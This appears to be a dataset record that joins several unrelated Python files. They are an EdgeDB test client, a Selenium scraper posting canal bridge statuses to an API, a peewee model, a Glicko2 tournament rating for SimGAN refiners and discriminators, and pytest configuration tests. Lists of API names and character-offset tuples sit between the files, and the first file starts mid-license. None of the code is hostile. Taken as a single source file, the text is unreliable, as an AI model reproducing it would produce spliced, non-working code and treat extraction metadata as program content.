# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A specialized client API for EdgeDB tests.
Historically EdgeDB tests relied on a very specific client API that
is no longer supported by edgedb-python. Here we implement that API
(for example, transactions can be nested and are non-retrying).
"""
from __future__ import annotations
import typing
import abc
import asyncio
import enum
import functools
import random
import socket
import ssl
import time
from edgedb import abstract
from edgedb import errors
from edgedb import con_utils
from edgedb import enums as edgedb_enums
from edgedb import options
from edgedb.protocol import asyncio_proto # type: ignore
from edgedb.protocol import protocol # type: ignore
class TransactionState(enum.Enum):
NEW = 0
STARTED = 1
COMMITTED = 2
ROLLEDBACK = 3
FAILED = 4
class BaseTransaction(abc.ABC):
ID_COUNTER = 0
def __init__(self, owner):
self._connection = owner
self._state = TransactionState.NEW
self._managed = False
self._nested = False
type(self).ID_COUNTER += 1
self._id = f'raw_tx_{self.ID_COUNTER}'
def is_active(self) -> bool:
return self._state is TransactionState.STARTED
def __check_state_base(self, opname):
if self._state is TransactionState.COMMITTED:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is already committed')
if self._state is TransactionState.ROLLEDBACK:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is already rolled back')
if self._state is TransactionState.FAILED:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is in error state')
def __check_state(self, opname):
if self._state is not TransactionState.STARTED:
if self._state is TransactionState.NEW:
raise errors.InterfaceError(
f'cannot {opname}; the transaction is not yet started')
self.__check_state_base(opname)
def _make_start_query(self):
self.__check_state_base('start')
if self._state is TransactionState.STARTED:
raise errors.InterfaceError(
'cannot start; the transaction is already started')
return self._make_start_query_inner()
@abc.abstractmethod
def _make_start_query_inner(self):
...
def _make_commit_query(self):
self.__check_state('commit')
return 'COMMIT;'
def _make_rollback_query(self):
self.__check_state('rollback')
if self._connection._top_xact is self:
self._connection._top_xact = None
if self._nested:
query = f'ROLLBACK TO SAVEPOINT {self._id};'
else:
query = 'ROLLBACK;'
return query
async def start(self) -> None:
query = self._make_start_query()
try:
await self._connection.execute(query)
except BaseException:
self._state = TransactionState.FAILED
raise
else:
self._state = TransactionState.STARTED
async def commit(self) -> None:
if self._managed:
raise errors.InterfaceError(
'cannot manually commit from within an `async with` block')
await self._commit()
async def _commit(self) -> None:
query = self._make_commit_query()
try:
await self._connection.execute(query)
except BaseException:
self._state = TransactionState.FAILED
raise
else:
self._state = TransactionState.COMMITTED
async def rollback(self) -> None:
if self._managed:
raise errors.InterfaceError(
'cannot manually rollback from within an `async with` block')
await self._rollback()
async def _rollback(self) -> None:
query = self._make_rollback_query()
try:
await self._connection.execute(query)
except BaseException:
self._state = TransactionState.FAILED
raise
else:
self._state = TransactionState.ROLLEDBACK
class RawTransaction(BaseTransaction):
def _make_start_query_inner(self):
con = self._connection
if con._top_xact is None:
con._top_xact = self
else:
# Nested transaction block
self._nested = True
if self._nested:
query = f'DECLARE SAVEPOINT {self._id};'
else:
query = 'START TRANSACTION;'
return query
def _make_commit_query(self):
query = super()._make_commit_query()
if self._connection._top_xact is self:
self._connection._top_xact = None
if self._nested:
query = f'RELEASE SAVEPOINT {self._id};'
return query
def _make_rollback_query(self):
query = super()._make_rollback_query()
if self._connection._top_xact is self:
self._connection._top_xact = None
if self._nested:
query = f'ROLLBACK TO SAVEPOINT {self._id};'
return query
async def __aenter__(self):
if self._managed:
raise errors.InterfaceError(
'cannot enter context: already in an `async with` block')
self._managed = True
await self.start()
return self
async def __aexit__(self, extype, ex, tb):
try:
if extype is not None:
await self._rollback()
else:
await self._commit()
finally:
self._managed = False
class Iteration(BaseTransaction, abstract.AsyncIOExecutor):
def __init__(self, retry, connection, iteration):
super().__init__(connection)
self._options = retry._options.transaction_options
self.__retry = retry
self.__iteration = iteration
self.__started = False
async def __aenter__(self):
if self._managed:
raise errors.InterfaceError(
'cannot enter context: already in an `async with` block')
self._managed = True
return self
async def __aexit__(self, extype, ex, tb):
self._managed = False
if not self.__started:
return False
try:
if extype is None:
await self._commit()
else:
await self._rollback()
except errors.EdgeDBError as err:
if ex is None:
# On commit we don't know if commit is succeeded before the
# database have received it or after it have been done but
# network is dropped before we were able to receive a response
raise err
# If we were going to rollback, look at original error
# to find out whether we want to retry, regardless of
# the rollback error.
# In this case we ignore rollback issue as original error is more
# important, e.g. in case `CancelledError` it's important
# to propagate it to cancel the whole task.
# NOTE: rollback error is always swallowed, should we use
# on_log_message for it?
if (
extype is not None and
issubclass(extype, errors.EdgeDBError) and
ex.has_tag(errors.SHOULD_RETRY)
):
return self.__retry._retry(ex)
def _make_start_query_inner(self):
return self._options.start_transaction_query()
def _get_query_cache(self) -> abstract.QueryCache:
return self._connection._query_cache
async def _query(self, query_context: abstract.QueryContext):
await self._ensure_transaction()
result, _ = await self._connection.raw_query(query_context)
return result
async def execute(self, query: str) -> None:
await self._ensure_transaction()
await self._connection.execute(query)
async def _ensure_transaction(self):
if not self._managed:
raise errors.InterfaceError(
"Only managed retriable transactions are supported. "
"Use `async with transaction:`"
)
if not self.__started:
self.__started = True
if self._connection.is_closed():
await self._connection.connect(
single_attempt=self.__iteration != 0
)
await self.start()
class Retry:
def __init__(self, connection):
self._connection = connection
self._iteration = 0
self._done = False
self._next_backoff = 0
self._options = connection._options
def _retry(self, exc):
self._last_exception = exc
rule = self._options.retry_options.get_rule_for_exception(exc)
if self._iteration >= rule.attempts:
return False
self._done = False
self._next_backoff = rule.backoff(self._iteration)
return True
def __aiter__(self):
return self
async def __anext__(self):
# Note: when changing this code consider also
# updating Retry.__next__.
if self._done:
raise StopAsyncIteration
if self._next_backoff:
await asyncio.sleep(self._next_backoff)
self._done = True
iteration = Iteration(self, self._connection, self._iteration)
self._iteration += 1
return iteration
class Connection(options._OptionsMixin, abstract.AsyncIOExecutor):
_top_xact: RawTransaction | None = None
def __init__(self, connect_args, *, test_no_tls=False):
super().__init__()
self._connect_args = connect_args
self._protocol = None
self._query_cache = abstract.QueryCache(
codecs_registry=protocol.CodecsRegistry(),
query_cache=protocol.QueryCodecsCache(),
)
self._test_no_tls = test_no_tls
self._params = None
self._log_listeners = set()
def add_log_listener(self, callback):
self._log_listeners.add(callback)
def remove_log_listener(self, callback):
self._log_listeners.discard(callback)
def _on_log_message(self, msg):
if self._log_listeners:
loop = asyncio.get_running_loop()
for cb in self._log_listeners:
loop.call_soon(cb, self, msg)
def _shallow_clone(self):
con = self.__class__.__new__(self.__class__)
con._connect_args = self._connect_args
con._protocol = self._protocol
con._query_cache = self._query_cache
con._test_no_tls = self._test_no_tls
con._params = self._params
return con
def _get_query_cache(self) -> abstract.QueryCache:
return self._query_cache
async def _query(self, query_context: abstract.QueryContext):
await self.ensure_connected()
result, _ = await self.raw_query(query_context)
return result
async def execute(self, query: str) -> None:
await self.ensure_connected()
await self._protocol.simple_query(
query, edgedb_enums.Capability.ALL # type: ignore
)
async def ensure_connected(self):
if self.is_closed():
await self.connect()
return self
async def raw_query(self, query_context: abstract.QueryContext):
return await self._protocol.execute_anonymous(
query=query_context.query.query,
args=query_context.query.args,
kwargs=query_context.query.kwargs,
reg=query_context.cache.codecs_registry,
qc=query_context.cache.query_cache,
io_format=query_context.query_options.io_format,
expect_one=query_context.query_options.expect_one,
required_one=query_context.query_options.required_one,
allow_capabilities=edgedb_enums.Capability.ALL, # type: ignore
)
async def _fetchall(
self,
query: str,
*args,
__limit__: int = 0,
__typeids__: bool = False,
__typenames__: bool = False,
__allow_capabilities__: typing.Optional[int] = None,
**kwargs,
):
await self.ensure_connected()
result, _ = await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
implicit_limit=__limit__,
inline_typeids=__typeids__,
inline_typenames=__typenames__,
io_format=protocol.IoFormat.BINARY,
allow_capabilities=__allow_capabilities__,
)
return result
async def _fetchall_with_headers(
self,
query: str,
*args,
__limit__: int = 0,
__typeids__: bool = False,
__typenames__: bool = False,
__allow_capabilities__: typing.Optional[int] = None,
**kwargs,
):
await self.ensure_connected()
return await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
implicit_limit=__limit__,
inline_typeids=__typeids__,
inline_typenames=__typenames__,
io_format=protocol.IoFormat.BINARY,
allow_capabilities=__allow_capabilities__,
)
async def _fetchall_json(
self,
query: str,
*args,
__limit__: int = 0,
**kwargs,
):
await self.ensure_connected()
result, _ = await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
implicit_limit=__limit__,
inline_typenames=False,
io_format=protocol.IoFormat.JSON,
)
return result
async def _fetchall_json_elements(self, query: str, *args, **kwargs):
await self.ensure_connected()
result, _ = await self._protocol.execute_anonymous(
query=query,
args=args,
kwargs=kwargs,
reg=self._query_cache.codecs_registry,
qc=self._query_cache.query_cache,
io_format=protocol.IoFormat.JSON_ELEMENTS,
allow_capabilities=edgedb_enums.Capability.EXECUTE, # type: ignore
)
return result
def _clear_codecs_cache(self):
self._query_cache.codecs_registry.clear_cache()
def _get_last_status(self) -> typing.Optional[str]:
if self._protocol is None:
return None
status = self._protocol.last_status
if status is not None:
status = status.decode()
return status
def is_closed(self):
return self._protocol is None or not self._protocol.connected
async def connect(self, single_attempt=False):
self._params, client_config = con_utils.parse_connect_arguments(
**self._connect_args,
command_timeout=None,
server_settings=None,
)
start = time.monotonic()
if single_attempt:
max_time = 0
else:
max_time = start + client_config.wait_until_available
iteration = 1
while True:
addr = self._params.address
try:
await asyncio.wait_for(
self.connect_addr(),
client_config.connect_timeout,
)
except TimeoutError as e:
if iteration > 1 and time.monotonic() >= max_time:
raise errors.ClientConnectionTimeoutError(
f"connecting to {addr} failed in"
f" {client_config.connect_timeout} sec"
) from e
except errors.ClientConnectionError as e:
if (
not e.has_tag(errors.SHOULD_RECONNECT) or
(iteration > 1 and time.monotonic() >= max_time)
):
nice_err = e.__class__(
con_utils.render_client_no_connection_error(
e,
addr,
attempts=iteration,
duration=time.monotonic() - start,
))
raise nice_err from e.__cause__
else:
return
iteration += 1
await asyncio.sleep(0.01 + random.random() * 0.2)
async def connect_addr(self):
tr = None
loop = asyncio.get_running_loop()
addr = self._params.address
protocol_factory = functools.partial(
asyncio_proto.AsyncIOProtocol, self._params, loop
)
try:
if isinstance(addr, str):
# UNIX socket
tr, pr = await loop.create_unix_connection(
protocol_factory, addr
)
elif self._test_no_tls:
tr, pr = await loop.create_connection(protocol_factory, *addr)
else:
try:
tr, pr = await loop.create_connection(
protocol_factory, *addr, ssl=self._params.ssl_ctx
)
except ssl.CertificateError as e:
raise con_utils.wrap_error(e) from e
except ssl.SSLError as e:
if e.reason == 'CERTIFICATE_VERIFY_FAILED':
raise con_utils.wrap_error(e) from e
tr, pr = await loop.create_connection(
functools.partial(protocol_factory, tls_compat=True),
*addr,
)
else:
con_utils.check_alpn_protocol(
tr.get_extra_info('ssl_object')
)
except socket.gaierror as e:
# All name resolution errors are considered temporary
raise errors.ClientConnectionFailedTemporarilyError(str(e)) from e
except OSError as e:
raise con_utils.wrap_error(e) from e
except Exception:
if tr is not None:
tr.close()
raise
pr.set_connection(self)
try:
await pr.connect()
except OSError as e:
if tr is not None:
tr.close()
raise con_utils.wrap_error(e) from e
except BaseException:
if tr is not None:
tr.close()
raise
self._protocol = pr
def retrying_transaction(self) -> Retry:
return Retry(self)
def transaction(self) -> RawTransaction:
return RawTransaction(self)
def is_in_transaction(self):
return self._protocol.is_in_transaction()
def get_settings(self) -> typing.Dict[str, typing.Any]:
return self._protocol.get_settings()
@property
def dbname(self) -> str:
return self._params.database
def connected_addr(self):
return self._params.address
async def aclose(self):
if not self.is_closed():
try:
self._protocol.terminate()
await self._protocol.wait_for_disconnect()
except (Exception, asyncio.CancelledError):
self.terminate()
raise
def terminate(self):
if not self.is_closed():
self._protocol.abort()
async def async_connect_test_client(
dsn: str = None,
host: str = None,
port: int = None,
credentials: str = None,
credentials_file: str = None,
user: str = None,
password: str = None,
database: str = None,
tls_ca: str = None,
tls_ca_file: str = None,
tls_security: str = None,
test_no_tls: bool = False,
wait_until_available: int = 30,
timeout: int = 10,
) -> Connection:
return await Connection(
{
"dsn": dsn,
"host": host,
"port": port,
"credentials": credentials,
"credentials_file": credentials_file,
"user": user,
"password": password,
"database": database,
"timeout": timeout,
"tls_ca": tls_ca,
"tls_ca_file": tls_ca_file,
"tls_security": tls_security,
"wait_until_available": wait_until_available,
},
test_no_tls=test_no_tls,
).ensure_connected()
|
[
"functools.partial",
"edgedb.con_utils.parse_connect_arguments",
"asyncio.sleep",
"edgedb.protocol.protocol.CodecsRegistry",
"edgedb.protocol.protocol.QueryCodecsCache",
"edgedb.errors.InterfaceError",
"asyncio.get_running_loop",
"random.random",
"time.monotonic",
"edgedb.errors.ClientConnectionTimeoutError",
"edgedb.con_utils.wrap_error"
] |
[((15785, 15889), 'edgedb.con_utils.parse_connect_arguments', 'con_utils.parse_connect_arguments', ([], {'command_timeout': 'None', 'server_settings': 'None'}), '(**self._connect_args, command_timeout=\n None, server_settings=None)\n', (15818, 15889), False, 'from edgedb import con_utils\n'), ((15948, 15964), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (15962, 15964), False, 'import time\n'), ((17458, 17484), 'asyncio.get_running_loop', 'asyncio.get_running_loop', ([], {}), '()\n', (17482, 17484), False, 'import asyncio\n'), ((17548, 17616), 'functools.partial', 'functools.partial', (['asyncio_proto.AsyncIOProtocol', 'self._params', 'loop'], {}), '(asyncio_proto.AsyncIOProtocol, self._params, loop)\n', (17565, 17616), False, 'import functools\n'), ((1976, 2055), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is already committed"""'], {}), "(f'cannot {opname}; the transaction is already committed')\n", (1997, 2055), False, 'from edgedb import errors\n'), ((2146, 2232), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is already rolled back"""'], {}), "(\n f'cannot {opname}; the transaction is already rolled back')\n", (2167, 2232), False, 'from edgedb import errors\n'), ((2314, 2390), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is in error state"""'], {}), "(f'cannot {opname}; the transaction is in error state')\n", (2335, 2390), False, 'from edgedb import errors\n'), ((2864, 2937), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot start; the transaction is already started"""'], {}), "('cannot start; the transaction is already started')\n", (2885, 2937), False, 'from edgedb import errors\n'), ((3880, 3966), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot manually commit from within an `async with` block"""'], {}), "(\n 'cannot manually commit from within an `async with` block')\n", (3901, 3966), False, 'from edgedb import errors\n'), ((4399, 4487), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot manually rollback from within an `async with` block"""'], {}), "(\n 'cannot manually rollback from within an `async with` block')\n", (4420, 4487), False, 'from edgedb import errors\n'), ((5899, 5978), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot enter context: already in an `async with` block"""'], {}), "('cannot enter context: already in an `async with` block')\n", (5920, 5978), False, 'from edgedb import errors\n'), ((6699, 6778), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""cannot enter context: already in an `async with` block"""'], {}), "('cannot enter context: already in an `async with` block')\n", (6720, 6778), False, 'from edgedb import errors\n'), ((8744, 8859), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['"""Only managed retriable transactions are supported. Use `async with transaction:`"""'], {}), "(\n 'Only managed retriable transactions are supported. Use `async with transaction:`'\n )\n", (8765, 8859), False, 'from edgedb import errors\n'), ((10963, 10989), 'asyncio.get_running_loop', 'asyncio.get_running_loop', ([], {}), '()\n', (10987, 10989), False, 'import asyncio\n'), ((2576, 2653), 'edgedb.errors.InterfaceError', 'errors.InterfaceError', (['f"""cannot {opname}; the transaction is not yet started"""'], {}), "(f'cannot {opname}; the transaction is not yet started')\n", (2597, 2653), False, 'from edgedb import errors\n'), ((9968, 10001), 'asyncio.sleep', 'asyncio.sleep', (['self._next_backoff'], {}), '(self._next_backoff)\n', (9981, 10001), False, 'import asyncio\n'), ((10504, 10529), 'edgedb.protocol.protocol.CodecsRegistry', 'protocol.CodecsRegistry', ([], {}), '()\n', (10527, 10529), False, 'from edgedb.protocol import protocol\n'), ((10555, 10582), 'edgedb.protocol.protocol.QueryCodecsCache', 'protocol.QueryCodecsCache', ([], {}), '()\n', (10580, 10582), False, 'from edgedb.protocol import protocol\n'), ((18995, 19018), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (19015, 19018), False, 'from edgedb import con_utils\n'), ((19311, 19334), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (19331, 19334), False, 'from edgedb import con_utils\n'), ((16478, 16589), 'edgedb.errors.ClientConnectionTimeoutError', 'errors.ClientConnectionTimeoutError', (['f"""connecting to {addr} failed in {client_config.connect_timeout} sec"""'], {}), "(\n f'connecting to {addr} failed in {client_config.connect_timeout} sec')\n", (16513, 16589), False, 'from edgedb import errors\n'), ((16422, 16438), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (16436, 16438), False, 'import time\n'), ((17367, 17382), 'random.random', 'random.random', ([], {}), '()\n', (17380, 17382), False, 'import random\n'), ((18227, 18250), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (18247, 18250), False, 'from edgedb import con_utils\n'), ((16842, 16858), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (16856, 16858), False, 'import time\n'), ((18394, 18417), 'edgedb.con_utils.wrap_error', 'con_utils.wrap_error', (['e'], {}), '(e)\n', (18414, 18417), False, 'from edgedb import con_utils\n'), ((18508, 18560), 'functools.partial', 'functools.partial', (['protocol_factory'], {'tls_compat': '(True)'}), '(protocol_factory, tls_compat=True)\n', (18525, 18560), False, 'import functools\n'), ((17154, 17170), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (17168, 17170), False, 'import time\n')]
|
import time
import bridge
import json
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
canal_web_source = 'http://www.greatlakes-seaway.com/R2/jsp/mNiaBrdgStatus.jsp?language=E'
welland_canal_api = 'https://wellandcanalapi.kaluba.tech'
try:
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.implicitly_wait(5)
driver.maximize_window()
driver.get(canal_web_source)
list_elements = driver.find_element_by_css_selector('div.sections')
list_items = list_elements.find_elements_by_tag_name("li")
json_output = "[ "
for item in list_items:
split_item = item.text.replace('Bridge ', '').replace(
'Bridge Status:', '').replace('Status: ', '').replace('Next Arrival: ', '').splitlines()
bridge_id = split_item[0]
bridge_status = split_item[2]
next_arrival = split_item[3]
canal_bridge = bridge.Bridge(bridge_id, bridge_status, next_arrival)
json_output += canal_bridge.toJsonString() + " ,"
driver.quit()
json_output = json_output[:-1]
json_output += " ]"
data = {'payload': json_output}
update_status_url = welland_canal_api+'/update_bridge_status'
request = requests.post(url=update_status_url, data=data)
print(json_output)
except:
print('An error occurred.')
|
[
"requests.post",
"selenium.webdriver.ChromeOptions",
"bridge.Bridge",
"selenium.webdriver.Chrome"
] |
[((372, 397), 'selenium.webdriver.ChromeOptions', 'webdriver.ChromeOptions', ([], {}), '()\n', (395, 397), False, 'from selenium import webdriver\n'), ((555, 602), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'chrome_options': 'chrome_options'}), '(chrome_options=chrome_options)\n', (571, 602), False, 'from selenium import webdriver\n'), ((1494, 1541), 'requests.post', 'requests.post', ([], {'url': 'update_status_url', 'data': 'data'}), '(url=update_status_url, data=data)\n', (1507, 1541), False, 'import requests\n'), ((1184, 1237), 'bridge.Bridge', 'bridge.Bridge', (['bridge_id', 'bridge_status', 'next_arrival'], {}), '(bridge_id, bridge_status, next_arrival)\n', (1197, 1237), False, 'import bridge\n')]
|
from datetime import datetime
from peewee import ForeignKeyField, DateTimeField
from wx.app import database
from wx.models.station import Station
class Report(database.Model):
station = ForeignKeyField(Station, related_name='reports')
timestamp = DateTimeField(default=datetime.now)
class Meta:
order_by = ('-timestamp',)
|
[
"peewee.ForeignKeyField",
"peewee.DateTimeField"
] |
[((194, 242), 'peewee.ForeignKeyField', 'ForeignKeyField', (['Station'], {'related_name': '"""reports"""'}), "(Station, related_name='reports')\n", (209, 242), False, 'from peewee import ForeignKeyField, DateTimeField\n'), ((260, 295), 'peewee.DateTimeField', 'DateTimeField', ([], {'default': 'datetime.now'}), '(default=datetime.now)\n', (273, 295), False, 'from peewee import ForeignKeyField, DateTimeField\n')]
|
'''
tournament to rank refiners + discriminators for simgan
'''
import numpy as np
import pandas as pd
import torch
def get_graph_ratings(refiners,
discriminators,
validation_data,
device,
starting_rating=1500,
starting_rd=350,
norm_val=173.7178,
n_rounds=3,
matches_per_pairing=5,
samples_per_match=10,
discriminator_win_thresh=0.6):
'''
TODO...can we get a Source?
https://arxiv.org/abs/1808.04888 ?????
Find the best refiner and discriminator from the list of refiners and discriminators using the Tournament Skill Rating Evaluation.
Parameters:
refiners (list(torch.nn)): list of refiners
discriminators (list(torch.nn)): list of discriminators
validation_data (simganData): SimGAN dataset
train_config (dict): dictionary holding information related to training
starting_rating (float): The rating that players were initialized to
starting_RD (float): The RD that players were initialized to
norm_val (float): The normalization value used to convert between phi and RD
n_rounds(int): Number of rounds for the tournament
matches_per_pairing(int): The number of matches per refiner/discriminator pairing to determine the overall winner
samples_per_match(int): The number of samples per match to determine the winner of the match
discriminator_win_thresh: The accuracy of the discriminator needed for the discriminator to be declared the winner
Returns:
A tuple a of Pandas DataFrames...
A Pandas DataFrame for metadata-ratings where 1 row is for 1 refiner (respectively for discriminator).
'''
n_refiners = len(refiners)
ids = np.arange(n_refiners + len(discriminators))
refiner_ids = ids[:n_refiners]
discriminator_ids = ids[n_refiners:]
ratings = {}
for id in ids:
ratings[id] = {'r': starting_rating, 'RD': starting_rd, 'mu': 0, 'phi': starting_rd/norm_val}
labels_real = torch.zeros(samples_per_match, dtype=torch.float, device=device)
labels_refined = torch.ones(samples_per_match, dtype=torch.float, device=device)
all_real = validation_data.real_raw
all_simulated = validation_data.simulated_raw
for rnd in range(n_rounds):
# instantiate match results
match_results = {}
for id in ids:
match_results[id] = {'opponent_mus': [], 'opponent_phis': [], 'scores': []}
# Perform matches between each pair (R,D)
for id_R, R in zip(refiner_ids, refiners):
for id_D, D in zip(discriminator_ids, discriminators):
# RODD - ?...why do we need multiple matches? why not just change samples to samples_per_match*matches_per_pairing
# ...like it's just running data through refiner and discrim. like why not just do that once but with more data?
for match in range(matches_per_pairing):
real_inds = np.random.choice(np.arange(len(all_real)), samples_per_match, replace=False)
real = torch.tensor(all_real[real_inds], dtype=torch.float, device=device)
sim_inds = np.random.choice(np.arange(len(all_simulated)), samples_per_match, replace=False)
simulated = torch.tensor(all_simulated[sim_inds], dtype=torch.float, device=device)
refined = R(simulated)
# Get discriminator accuracy on real and refined data
d_pred_real = D(real)
acc_real = calc_acc(d_pred_real, labels_real)
d_pred_refined = D(refined)
acc_refined = calc_acc(d_pred_refined, labels_refined)
# Find the average accuracy of the discriminator
avg_acc = (acc_real + acc_refined) / 2.0
# Add this match's results to match_results
match_results[id_D]['opponent_mus'].append(ratings[id_R]['mu'])
match_results[id_R]['opponent_mus'].append(ratings[id_D]['mu'])
match_results[id_D]['opponent_phis'].append(ratings[id_R]['phi'])
match_results[id_R]['opponent_phis'].append(ratings[id_D]['phi'])
if avg_acc >= discriminator_win_thresh: # An accuracy greater than or equal to this threshold is considered a win for the discriminator
# A score of 1 is a win
match_results[id_D]['scores'].append(1)
match_results[id_R]['scores'].append(0)
else:
match_results[id_D]['scores'].append(0)
match_results[id_R]['scores'].append(1)
# Update scores for the refiners and discriminators
new_ratings = ratings.copy()
for id in ids:
results = match_results[id]
glicko_calculations = calculate_new_glicko_scores(ratings[id]['mu'],
ratings[id]['phi'],
np.array(results['opponent_mus']),
np.array(results['opponent_phis']),
np.array(results['scores']),
starting_rating,
norm_val)
new_ratings[id]['mu'], new_ratings[id]['phi'], new_ratings[id]['r'], new_ratings[id]['RD'] = glicko_calculations
ratings = new_ratings
# Get refiner and discriminator with best ratings
ratings_pd = pd.DataFrame(ratings).T
refiner_ratings = ratings_pd.loc[refiner_ids]
discriminator_ratings = ratings_pd.loc[discriminator_ids]
return refiner_ratings, discriminator_ratings
def calc_acc(tensor_output, tensor_labels):
'''
Calculate the percent accuracy of the output, using the labels.
Note that the sigmoid is already calculated as part of the Discriminator Network.
Parameters:
tensor_output (torch.Tensor): M tensor output of the discriminator (M samples,) probability of being class '1'
tensor_labels (torch.Tensor): M tensor true labels for each sample
Returns:
acc (float): the probability accuracy of the output vs. the true labels
'''
y_pred = torch.round(tensor_output)#.detatch())
acc = torch.sum(y_pred == tensor_labels.detach()) / len(tensor_labels.detach())
return acc
def calculate_new_glicko_scores(old_mu, old_phi, opponent_mus, opponent_phis, scores, starting_rating, norm_val):
'''
TODO ...Source ????
http://www.glicko.net/glicko/glicko2.pdf ????
https://en.wikipedia.org/wiki/Glicko_rating_system ????
Calculate and return the new glicko values for the player using Glicko2 calculation
Parameters:
old_mu (float): The former mu rating
old_phi (float): The former phi rating
opponent_mus (list(float)): The mu ratings of the opponents played
opponent_phis (list(float)): The phi ratings of the opponents played
scores (list(inte)): The scores of the games played, 1 indicating a win, 0 indicating a loss
starting_rating (float): The rating that players were initialized to
norm_val (float): The normalization value used to convert between phi and RD
Returns:
(new_mu, new_phi, new_rating, new_rd) (float, float, float, float): The updated Glicko values for the player
'''
g = 1.0 / (1 + 3 * opponent_phis**2 / np.pi**2) ** 0.5 # TODO: explain/figure out what g is
E = 1.0 / (1 + np.exp(-1 * g * (old_mu - opponent_mus))) # Probability of player winning each match
v = np.sum(g**2 * E * (1 - E)) ** -1 # Estimated variance of the player's rating based on game outcomes
delta = v * np.sum(g * (scores - E)) # Estimated improvement in rating
new_phi = 1 / (1/old_phi**2 + 1/v) ** 0.5
new_mu = old_mu + new_phi**2 * np.sum(g * (scores - E))
new_rating = norm_val * new_mu + starting_rating
new_rd = norm_val * new_phi
return new_mu, new_phi, new_rating, new_rd
|
[
"pandas.DataFrame",
"torch.ones",
"numpy.sum",
"numpy.array",
"numpy.exp",
"torch.zeros",
"torch.round",
"torch.tensor"
] |
[((2232, 2296), 'torch.zeros', 'torch.zeros', (['samples_per_match'], {'dtype': 'torch.float', 'device': 'device'}), '(samples_per_match, dtype=torch.float, device=device)\n', (2243, 2296), False, 'import torch\n'), ((2318, 2381), 'torch.ones', 'torch.ones', (['samples_per_match'], {'dtype': 'torch.float', 'device': 'device'}), '(samples_per_match, dtype=torch.float, device=device)\n', (2328, 2381), False, 'import torch\n'), ((6683, 6709), 'torch.round', 'torch.round', (['tensor_output'], {}), '(tensor_output)\n', (6694, 6709), False, 'import torch\n'), ((5944, 5965), 'pandas.DataFrame', 'pd.DataFrame', (['ratings'], {}), '(ratings)\n', (5956, 5965), True, 'import pandas as pd\n'), ((8078, 8106), 'numpy.sum', 'np.sum', (['(g ** 2 * E * (1 - E))'], {}), '(g ** 2 * E * (1 - E))\n', (8084, 8106), True, 'import numpy as np\n'), ((8194, 8218), 'numpy.sum', 'np.sum', (['(g * (scores - E))'], {}), '(g * (scores - E))\n', (8200, 8218), True, 'import numpy as np\n'), ((7985, 8025), 'numpy.exp', 'np.exp', (['(-1 * g * (old_mu - opponent_mus))'], {}), '(-1 * g * (old_mu - opponent_mus))\n', (7991, 8025), True, 'import numpy as np\n'), ((8334, 8358), 'numpy.sum', 'np.sum', (['(g * (scores - E))'], {}), '(g * (scores - E))\n', (8340, 8358), True, 'import numpy as np\n'), ((5342, 5375), 'numpy.array', 'np.array', (["results['opponent_mus']"], {}), "(results['opponent_mus'])\n", (5350, 5375), True, 'import numpy as np\n'), ((5439, 5473), 'numpy.array', 'np.array', (["results['opponent_phis']"], {}), "(results['opponent_phis'])\n", (5447, 5473), True, 'import numpy as np\n'), ((5537, 5564), 'numpy.array', 'np.array', (["results['scores']"], {}), "(results['scores'])\n", (5545, 5564), True, 'import numpy as np\n'), ((3300, 3367), 'torch.tensor', 'torch.tensor', (['all_real[real_inds]'], {'dtype': 'torch.float', 'device': 'device'}), '(all_real[real_inds], dtype=torch.float, device=device)\n', (3312, 3367), False, 'import torch\n'), ((3513, 3584), 'torch.tensor', 'torch.tensor', (['all_simulated[sim_inds]'], {'dtype': 'torch.float', 'device': 'device'}), '(all_simulated[sim_inds], dtype=torch.float, device=device)\n', (3525, 3584), False, 'import torch\n')]
|
import pytest
def test_config_exists():
from infrastructure.config import config
assert 'demo' in config['environment']
def test_config_common_dataclass():
from infrastructure.config import Common
common = Common()
assert common.organization_name == 'igvf-dacc'
assert common.project_name == 'igvfd'
def test_config_config_dataclass():
from infrastructure.config import Config
config = Config(
name='demo',
branch='xyz-branch',
pipeline='xyz-pipeline',
)
assert config.common.organization_name == 'igvf-dacc'
assert config.common.project_name == 'igvfd'
assert config.snapshot_source_db_identifier is None
assert config.branch == 'xyz-branch'
assert config.pipeline == 'xyz-pipeline'
def test_config_build_config_from_name():
from infrastructure.config import build_config_from_name
from infrastructure.constants import DEV_DATABASE_IDENTIFIER
config = build_config_from_name(
'demo',
branch='my-branch',
pipeline='my-pipeline',
)
assert config.common.organization_name == 'igvf-dacc'
assert config.common.project_name == 'igvfd'
